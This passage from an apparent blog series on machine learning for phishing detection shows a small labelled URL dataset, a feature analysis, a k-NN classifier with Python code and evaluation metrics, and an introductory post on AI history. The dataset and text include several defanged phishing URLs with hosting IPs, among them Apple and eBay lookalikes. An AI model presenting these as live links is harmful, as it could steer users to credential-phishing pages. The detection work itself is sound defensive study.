<tr style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;"><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">1</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">[http://]admin<span style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;">.</span>palmariguani<span style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;">.</span>com/...</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">192.186.205.8</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">godaddy</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">2</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">US</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">phishing</td></tr>
<tr style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;"><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">2</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">[http://]www<span style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;">.</span>whoes<span style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;">.</span>info/docs/fox/dropbox/</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">107.180.26.63</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">godaddy</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">1</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">Murrica</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">phishing</td></tr>
<tr style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;"><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">3</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">[http://]www<span style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;">.</span>apple-id<span style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;">.</span>ldn-app<span style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;">.</span>mobi/apple</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">208.109.255.48</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">godaddy</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">1</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">US</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">phishing</td></tr>
<tr style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;"><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">4</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">[http://]v01-apple<span style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;">.</span>co<span style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;">.</span>uk</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">45.79.129.214</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">godaddy</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">1</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">UK</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">phishing</td></tr>
<tr style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;"><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">5</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">[https://]www<span style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;">.</span>bth<span style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;">.</span>se/</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">194.47.131.132</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">SE Direkt</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">14</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">SE</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">benign</td></tr>
<tr style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;"><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">6</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">[https://]wikipedia<span style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;">.</span>com</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">208.80.154.238</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">MARKMONITOR INC.</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">16</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">US</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">benign</td></tr>
<tr style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;"><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">7</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">...</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">...</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">...</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">...</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">...</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">...</td></tr>
</tbody></table>
Then we perform exploratory data analysis.</div>
<div>
<img src="https://s.dou.ua/storage-files/image9_8dnmLA7.png" /></div>
<div>
<br /></div>
<div style="text-align: center;">
<i>Figure 1. </i>The charts showing the frequency of occurrence of the values of three attributes: a) registrar name (Registrar), b) domain registration period (Lifetime), c) geolocation of the hosting server (Countries) for phishing and benign URLs.</div>
<div>
<br /></div>
<div>
<div>
After a preliminary data analysis, we see that the <i>Registrar</i> and <i>Country</i> attributes will be difficult to use for classification, since the most common values overlap heavily between the two classes. Differences in these two attributes are more subtle and can be revealed in larger datasets. However, the Lifetime attribute, corresponding to the period for which the domain is registered, shows that phishing domains tend to be registered for a shorter period. For example, 37% of phishing domains were registered for 1 year, in contrast to benign domains, which are usually registered for a longer period - 10 years and more.</div>
<div>
<br /></div>
<div>
As for TLS, the overwhelming majority of phishing links (96%) do not use the HTTPS protocol. Therefore, this is one of the essential criteria that can be used to detect phishing attacks. For HTTPS URLs, you can additionally analyze the certificate based on its attributes: for instance, which certificate authority (CA) issued the certificate, to whom it was issued, and the registration address of the company to which it was issued. Attackers can obtain certificates for fake companies, as happened with the LockerGoga ransomware, whose files were signed with digital certificates issued by Sectigo RSA Code Signing CA to the fake companies Alina Ltd, Kitty’s Ltd., Mikl Limited and AB Simba Limited. I recommend reading <a href="https://medium.com/@chroniclesec/abusing-code-signing-for-profit-ef80a37b50f4">the Chronicle study</a> on this matter.</div>
<div>
<br /></div>
<div>
When preparing a dataset, we need to translate all string values into categorical ones and encode them with numerical values. The simplest way is to use an ordinal number for the category to represent its values in a numerical space. For example, for the categorical attribute <i>Country</i>, we create a new numerical attribute <i>Country_code</i> with the ordinal number of a country found in the dataset (1 - Australia, 2 - Bangladesh, 3 - Canada, ..., 28 - USA).</div>
</div>
<div>
<br /></div>
<div>
<img src="https://s.dou.ua/storage-files/Untitled-3_wzN1Yk4.png" /></div>
<div style="text-align: center;">
<i>Figure 2. </i>Distribution of phishing (orange dots) and benign (blue dots) links depending on the registration period (lifetime), geolocation (Country_code) and network protocol type (Protocol_code: {0 - http, 1 - https}).</div>
<div>
<i><br /></i></div>
<div>
<div>
The figure shows several trends in the distribution of data:</div>
<div>
<ul style="text-align: left;">
<li>A large share of IP addresses (47% of phishing and 53% of benign) are located in the US (Country_code = 28).</li>
<li>The vast majority of phishing links (96%) use HTTP, while all benign links use encrypted communication (HTTPS).</li>
<li>The registration period for phishing domains is generally substantially shorter than for benign ones. In a larger dataset, this trend will be better expressed and will tend to one year.</li>
</ul>
</div>
<div>
Now, we’ll apply the k-nearest neighbors algorithm (k-NN) for link classification. The algorithm assigns to an object the class that is most common among its k nearest neighbors, whose classes are already known.</div>
<div>
<br /></div>
<div>
But first, we need to train our model and then draw the <i>decision boundary</i> of the classifier. If a new link falls into the blue zone, it will be classified as benign; if into the orange one, as phishing. The more labeled links the training dataset contains, the higher the accuracy of the classifier. In addition, you can experiment with model parameters, such as the number of nearest neighbors, the weight function, the algorithm for finding nearest neighbors, and others.</div>
</div>
<div>
<img src="https://s.dou.ua/storage-files/Untitled-2_9R8pjG7.png" /></div>
<div style="text-align: center;">
<i>Figure 3. </i>The binary classifier based on the k-NN algorithm. Parameters: the number of neighbors <i>k</i> = 5; weight functions: on the left - <i>uniform</i> (all points in each neighborhood have the same weight) and on the right - <i>distance </i>(closer neighbors of the query point will have a greater impact than neighbors that are farther).</div>
<div>
<br /></div>
<div>
<div>
Then, we can use the trained classifier to detect phishing links. For example, </div>
<blockquote class="tr_bq">
<i><span style="color: red;">hxxps://www.ebay.com.items-checkout.us/item=2328358263481rt=nctrksid=p2328358263481/ </span></i></blockquote>
<div>
(source: <a href="http://phishtank.org/phish_detail.php?phish_id=6362700">Phishtank</a>) - a URL leading to a fake eBay webpage with the following attributes: </div>
<div>
<ul style="text-align: left;">
<li>the domain registered for 1 year (27.01.2019 - 27.01.2020), </li>
<li>the server is located in the USA, HTTPS is enabled, </li>
<li>the registrar is NameCheap, Inc. </li>
</ul>
</div>
<div>
will be detected by our classifier as phishing. But if the domain had been registered for 3 years instead of 1, our classifier would classify it as benign.</div>
<div>
<br /></div>
<div>
To evaluate the classifier, it is necessary to carry out <a href="https://en.wikipedia.org/wiki/Cross-validation_(statistics)">cross-validation</a> on a test dataset with known classes. The test result will show us the classification errors such as false positives and false negatives. In particular, the following basic metrics can be used to evaluate the classifier:</div>
<div>
<ul style="text-align: left;">
<li>True positive (TP) - the number of phishing links identified as phishing;</li>
<li>True negative (TN) - the number of benign links identified as benign;</li>
<li>False positive (FP) - the number of benign links identified as phishing;</li>
<li>False negative (FN) - the number of phishing links identified as benign.</li>
</ul>
</div>
</div>
<div>
<div>
And the metrics derived from them:</div>
<div>
<ul style="text-align: left;">
<li>True positive rate (TPR) or Recall = TP / (TP + FN);</li>
<li>True negative rate (TNR) = TN / (TN + FP);</li>
<li>False positive rate (FPR) = FP / (FP + TN);</li>
<li>False negative rate (FNR) = FN / (FN + TP);</li>
<li>Precision or Positive predictive value (PPV) = TP / (TP + FP);</li>
<li>Negative predictive value (NPV) = TN / (TN + FN);</li>
<li>Accuracy = (TP+TN) / (P+N) = (TP + TN) / (TP + TN + FP + FN);</li>
<li>F-measure - harmonic mean between Recall (TPR) and Precision (PPV) = 2 * Precision * Recall / (Precision + Recall).</li>
</ul>
</div>
<div>
In the context of detecting cyber attacks, the most important is the FN / FNR metric, which quantifies the missed attacks.</div>
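<div>
The pipeline described above, from the ordinal encoding of Lifetime, Country_code and Protocol_code through the k-NN vote with the <i>uniform</i> and <i>distance</i> weight functions to the TP/TN/FP/FN counts and the derived metrics, as an added worked example in plain Python. It is not the post's own code; the training and test records are constructed for illustration and are not the post's dataset.</div>

```python
"""Added example (not the post's code): ordinal encoding, k-NN voting and
evaluation metrics for phishing-URL features in plain Python (no sklearn)."""
from collections import Counter
import math

# Constructed records for illustration, not the post's dataset.
# Fields: (lifetime in years, hosting country, protocol, label)
TRAIN_RECORDS = [
    (1, "USA", "http", "phishing"),
    (1, "USA", "http", "phishing"),
    (1, "UK", "http", "phishing"),
    (1, "Canada", "http", "phishing"),
    (1, "Australia", "http", "phishing"),
    (1, "USA", "https", "phishing"),  # the small minority of phishing sites with TLS
    (10, "USA", "https", "benign"),
    (15, "USA", "https", "benign"),
    (5, "Australia", "https", "benign"),
    (3, "USA", "https", "benign"),
    (4, "UK", "https", "benign"),
    (12, "Canada", "https", "benign"),
    (3, "UK", "https", "benign"),
]
TEST_RECORDS = [
    (1, "USA", "https", "phishing"),  # the eBay-style URL from the post
    (3, "USA", "https", "benign"),
    (1, "Canada", "http", "phishing"),
    (2, "UK", "https", "benign"),  # a young but benign domain
]
PROTOCOL_CODE = {"http": 0, "https": 1}


def build_country_map(records):
    """Ordinal encoding as in the post: countries sorted by name get 1, 2, 3, ..."""
    return {name: i for i, name in enumerate(sorted({r[1] for r in records}), 1)}


COUNTRY_CODE = build_country_map(TRAIN_RECORDS + TEST_RECORDS)


def encode(lifetime, country, protocol, country_map=COUNTRY_CODE):
    """Feature vector [Lifetime, Country_code, Protocol_code]. Caveat: the country
    ordinal is an arbitrary label, so the distance between two codes means nothing."""
    return [lifetime, country_map[country], PROTOCOL_CODE[protocol]]


TRAIN = [(encode(lt, c, p), label) for lt, c, p, label in TRAIN_RECORDS]


def euclidean(a, b):
    return math.sqrt(sum((x - y) ** 2 for x, y in zip(a, b)))


def knn_predict(train, query, k=5, weights="uniform"):
    """Vote among the k nearest training points. "uniform": every neighbour
    counts 1; "distance": each counts 1/d, and exact matches (d == 0) decide alone."""
    ranked = sorted(((euclidean(x, query), label) for x, label in train),
                    key=lambda pair: pair[0])[:k]
    votes = Counter()
    if weights == "uniform":
        votes.update(label for _, label in ranked)
    elif weights == "distance":
        exact = [label for d, label in ranked if d == 0.0]
        if exact:
            votes.update(exact)
        else:
            for d, label in ranked:
                votes[label] += 1.0 / d
    else:
        raise ValueError("weights must be 'uniform' or 'distance'")
    return votes.most_common(1)[0][0]


def confusion_counts(train, test_records, k=5, weights="uniform", positive="phishing"):
    """TP/TN/FP/FN over labeled test records, with phishing as the positive class."""
    counts = {"TP": 0, "TN": 0, "FP": 0, "FN": 0}
    for lt, c, p, truth in test_records:
        pred = knn_predict(train, encode(lt, c, p), k, weights)
        if truth == positive:
            counts["TP" if pred == positive else "FN"] += 1
        else:
            counts["FP" if pred == positive else "TN"] += 1
    return counts


def _ratio(num, den):
    return num / den if den else 0.0  # an undefined ratio is reported as 0.0


def metrics(c):
    """The derived metrics listed in the post."""
    tp, tn, fp, fn = c["TP"], c["TN"], c["FP"], c["FN"]
    tpr = _ratio(tp, tp + fn)  # recall
    ppv = _ratio(tp, tp + fp)  # precision
    return {"TPR": tpr, "TNR": _ratio(tn, tn + fp),
            "FPR": _ratio(fp, fp + tn), "FNR": _ratio(fn, fn + tp),  # FNR: missed attacks
            "PPV": ppv, "NPV": _ratio(tn, tn + fn),
            "Accuracy": _ratio(tp + tn, tp + tn + fp + fn),
            "F1": _ratio(2 * ppv * tpr, ppv + tpr)}
```

<div>
On the constructed data, a domain registered for 1 year over HTTPS in the USA is voted phishing and the same record with a 3-year lifetime benign, as in the eBay example above, while the 2-year benign test record comes out as a false positive.</div>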
<div>
<br />
If you want to play with the model, the source code is available on <a href="https://github.com/AlexanderAda/NioGuardSecurityLab/tree/master/Courses/ML%20in%20Cybersecurity/Classification/Phishing%20detection">Github</a>.<br />
<br /></div>
<div>
In <a href="https://www.nioguard.com/2020/03/ai-and-cybersecurity-part-3.html">the next post</a>, we'll consider the visualization problem and dimensionality reduction.</div>
<div>
<i>To be continued...</i></div>
</div>
</div>
Alexander Adamov | http://www.blogger.com/profile/10336415028200154730 | noreply@blogger.com | 0 | tag:blogger.com,1999:blog-4482404627541610819.post-4889181068728470567 | 2020-03-14T12:01:00.001-07:00 | 2020-03-16T14:22:14.430-07:00 | AI and Cybersecurity. Part 1 - Intro<div dir="ltr" style="text-align: left;" trbidi="on">
<h2 style="text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5Fys0kKPgcjIuGPUfwlYVbrpPzVmNcoaIc2hOEdaXidEo40XWZmOqyGWoSbu4Jxfh2CvFPu-mV4M91CzIjElOxX4TMaM1Vyqk2kba9pETFsRVCnOHD0FNY60Wzy28Oq8-UC14xIrUQ9hi/s1600/AI_ML.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="819" data-original-width="1024" height="508" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5Fys0kKPgcjIuGPUfwlYVbrpPzVmNcoaIc2hOEdaXidEo40XWZmOqyGWoSbu4Jxfh2CvFPu-mV4M91CzIjElOxX4TMaM1Vyqk2kba9pETFsRVCnOHD0FNY60Wzy28Oq8-UC14xIrUQ9hi/s640/AI_ML.jpg" width="640" /></a></h2>
<div style="text-align: right;">
Image via <a href="https://www.vpnsrus.com/">www.vpnsrus.com</a></div>
<div>
<i>[Author: Alexander Adamov]</i><br />
<b><br /></b>
<b>Foreword</b><br />
I have spent almost all my professional life working in the antivirus industry detecting and analyzing malware. Around ten years ago, when the malware flow had grown so much that my colleagues and I no longer had enough resources to analyze all of it, we started thinking about automating our efforts. How do you build a machine that autonomously detects and analyzes malware and phishing URLs day and night, and writes and publishes reports? As a result, we managed to create a robot (what we now call a 'malware sandbox') from scratch to automate most of the processes in the malware laboratory with the help of His Majesty Artificial Intelligence (AI). Since then, we have accumulated a bunch of use cases for cyberattack detection, malware analysis, and security testing with ML that can be useful for cybersecurity professionals who decide to leverage ML for cyberdefense. I'm going to share this knowledge in a series of blog posts that will eventually become part of a new university course '<i>ML in Cybersecurity</i>' that I plan to make open-source. I also welcome cybersecurity experts and data scientists to contribute and help universities adopt the course.<br />
<br />
<a name='more'></a>Today, we start with the main paradigms of AI and, in the next post, we'll consider an example of detecting phishing URLs using classification methods and cluster analysis. But first, I would like to invite you to join a brief tour of AI history to understand its basic concepts.<br />
<br />
<b>Diverse AI. History tour</b><br />
The term “Artificial Intelligence” (AI) was first used by John McCarthy (Dartmouth College), Marvin Minsky (Harvard University), Nathaniel Rochester (IBM) and Claude Shannon (Bell Telephone Laboratories) in 1956. Since then, the definition of AI has repeatedly changed depending on the level of development of information technology. Therefore, it is usually interpreted depending on the context and level of technology maturity. Such definitions are called AI paradigms, and the process of changing them is called the AI paradigm shift. For example, David Auerbach <a href="https://thenewcentre.org/seminars/paradigms-artificial-intelligence/">identifies</a> five AI paradigms:<br />
<ul style="text-align: left;">
<li>Speculative (until 1940).</li>
<li>Cybernetic (1940–1955).</li>
<li>Symbolic AI (1955–1985), AI winter (1974–80).</li>
<li>Subsymbolic AI (1985–2010), 2nd AI winter (1987–1993).</li>
<li>Deep Learning (2010 —...).</li>
</ul>
<div>
To verify this, just search for the terms Artificial Intelligence (AI), Machine Learning (ML) and Data Mining, and you will get a lot of Euler diagrams showing the relationships between these scientific areas, all of them different :)<br />
<br /></div>
<img height="294" src="https://s.dou.ua/storage-files/Untitled-1_k3WsuI9.png" width="640" /><br />
<div style="text-align: center;">
<img height="291" src="https://s.dou.ua/storage-files/image4_Hc2saPA.png" width="400" /></div>
<i>Figure 1. A variety of existing relationships between Artificial Intelligence, Machine Learning, Data Mining, and Statistics shown with Euler diagrams. Image Sources: <a href="https://medium.com/@divyacyclitics15/understanding-different-components-roles-in-data-science-5e6cb4b4fe23" target="_blank">1</a>, <a href="https://www.analyticsvidhya.com/blog/2015/07/difference-machine-learning-statistical-modeling/" target="_blank">2</a>, <a href="https://towardsdatascience.com/artificial-intelligence-in-procurement-supply-chain-d37875e76e62" target="_blank">3</a></i><br />
<br />
Ron Schmelzer (Managing Partner & Principal Analyst at AI Focused Research and Advisory firm Cognilytica), in his Forbes <a href="https://www.forbes.com/sites/cognitiveworld/2019/11/21/is-machine-learning-really-ai/">article</a>, argues that there are two polar opinions.<br />
<br />
According to one, only Artificial General Intelligence (AGI - general, full or strong AI), which has the same cognitive abilities as a human, can be called real AI; and only those ML algorithms that serve the purpose of AGI can honorably be called AI. This position is characteristic of the paradigms of the middle of the XX century.<br />
<br />
In 1950, Alan Turing, in his famous work <a href="https://www.csee.umbc.edu/courses/471/papers/turing.pdf">Computing Machinery and Intelligence</a>, proposed a test to answer the question "can the machine think?". The essence of the test, which was called the Imitation Game, was to ask questions of a human and a machine in turn and try to figure out from their answers which of the two you are communicating with at the moment. His AI convention was: "If a machine acts as reasonably as a human, then it is as intelligent as a human."<br />
<br />
Steve Wozniak subsequently proposed his own version of the test, called the Coffee Test, the essence of which was that a machine (robot), entering an unfamiliar American house, could find all the necessary ingredients and devices to make a coffee :)<br />
<br />
Seven years later, in 1957, Frank Rosenblatt created the first Perceptron (the simplest artificial neural network), giving the U.S. military the hope of creating a machine that can walk, talk, see, write, reproduce itself and be aware of its existence.<br />
<br />
To date, the described concepts are rather similar to the scripts for the series “Black Mirror” and are still far from reality.<br />
<br />
Another, more practical position is taken by scientists engaged in applied research in the field of AI (Applied AI). Within this paradigm, ML is a subset of AI. AI can be defined as an algorithm that finds a pattern in the input data or makes an assessment of it. The algorithm then uses the results to make decisions, as if it were a human. We will consider the problem of detecting and blocking cyberattacks from the perspective of Applied AI.<br />
<br />
<div style="text-align: center;">
<img height="144" src="https://s.dou.ua/storage-files/image7_a1oYhi7.png" width="400" /></div>
<i>Figure 2. The Euler diagrams illustrating the difference in the paradigms of General AI (left) and Applied AI </i><i>(right).</i><br />
<br />
<b>Cyberattacks: well-known and not so well-known</b><br />
<br />
Two approaches are traditionally distinguished for identifying cyberattacks: deterministic and probabilistic. The first one usually takes advantage of signatures - unique byte sequences that describe malicious objects (files, processes, network connections, keys in the Windows registry, kernel synchronization objects) and allow a defender to uniquely identify known cyberattacks automatically.<br />
<br />
The second approach is mainly used to block unknown threats or zero-day threats within targeted attacks when we do not know the indicators of compromise in advance. As the name implies, this approach enables the identification of new cyberattacks with some probability, leaving the last word to a user or cybersecurity expert. The probabilistic approach opens up a wide field for the use of AI with ML.<br />
<br />
<b>Machine learning triad</b><br />
<br />
Commonly, ML has three main approaches:<br />
<ol style="text-align: left;">
<li><b>Supervised learning</b> that can be used for:</li>
<ul>
<li>Classification and recognition</li>
<li>Pattern recognition</li>
<li>Supervised anomaly detection</li>
<li>Forecasting (regression analysis)</li>
</ul>
<li><b>Unsupervised learning</b></li>
<ul>
<li>Clustering</li>
<li>Pattern recognition</li>
<li>Unsupervised anomaly detection</li>
</ul>
<li><b>Reinforcement learning</b></li>
<ul>
<li>Robot control</li>
<li>Game theory - algorithms for Go (AlphaGo), chess (AlphaZero), checkers, online strategic games. AI initially knows only the rules of the game and creates algorithms and strategies while playing with other instances of itself.</li>
</ul>
</ol>
There are two more hybrid approaches:<br />
<ol style="text-align: left;">
<li><b>Semi-supervised learning</b> - training on input data in which only some records carry a class label.</li>
<li><b>Self-supervised learning</b>. The class labels are already present in the input data. For example, for an existing set of images, we generate new images by rotating them by 90, 180, or 270 degrees. The task of the model is to learn how to turn the rotated images back to their original position. Another example is reassembling a puzzle after cutting the image into pieces. In both tasks, we know the desired result and teach the model to find it.</li>
</ol>
<br />
<b>Supervised attack detection</b><br />
The most popular task in the field of cybersecurity is binary classification, i.e. dividing objects into malicious and benign in order to detect and block cyber attacks. This implies that, in addition to the classes themselves, we already know the criteria by which we attribute the objects. To develop these criteria, we must have knowledge of the threat. In other words, classification methods allow you to identify known types of threats and attack vectors but do not allow you to identify a new cyberattack that does not use traditional techniques and does not contain indicators known to us.<br />
<br />
In addition, the creation of a binary classifier is fraught with a number of problems such as the lack of labeled data and adequate feature extraction.<br />
<br />
<b>The lack of labeled data</b><br />
The first problem is the lack of a large amount of classified data that already has a label (e.g. an object is malicious or benign, it is an indicator of attack or normal activity) that could be suitable for supervised training.<br />
<br />
For example, to train a neural network to distinguish cats from dogs, you must first provide labeled images. Such labeling is usually done manually, and it is difficult to do on large amounts of data. If we talk about cats and dogs, then, fortunately, we can use the <a href="https://www.kaggle.com/c/dogs-vs-cats/data">datasets from Kaggle</a> that already exist, containing 25,000 classified images. You can also use CAPTCHA so that users categorize images while passing a test that identifies Internet crawlers.<br />
<br />
<div style="text-align: center;">
<img height="400" src="https://s.dou.ua/storage-files/image6_fsDbrLC.png" width="221" /></div>
<div style="text-align: center;">
<span style="text-align: left;"><i>"To prove that you are not a robot, select the pictures that show the shelters in which you would hide during the rise of machines"</i></span></div>
<br />
